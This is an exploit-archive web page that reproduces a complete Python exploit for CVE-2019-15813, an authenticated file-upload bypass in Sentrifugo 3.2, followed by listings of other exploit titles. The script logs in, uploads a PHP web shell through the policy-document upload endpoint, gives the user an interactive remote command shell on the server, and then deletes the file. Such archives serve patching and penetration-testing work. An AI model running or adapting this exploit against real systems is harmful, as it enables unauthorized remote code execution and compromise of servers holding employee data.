To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)"

Author

Exploit author

"Gurkirat Singh"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor

from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *

parser = ArgumentParser(description="Exploit for CVE-2019-15813",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}

    r = http.post(args.t + "/index.php/index/loginpopupsave",
                  data=data,
                  allow_redirects=False)

    if not (r.headers.get("Location", "").endswith("welcome")
            or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}

    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    file_name = r.json()["filedata"]["new_name"]
    print(info("Spawning shell"))

    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
                          file_name,
                          data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
              data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-10-27 "Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)" webapps php "Gurkirat Singh"
2020-10-27 "Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)" webapps php "Gurkirat Singh"
2020-10-26 "CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection" webapps php "Gurkirat Singh"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48955/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.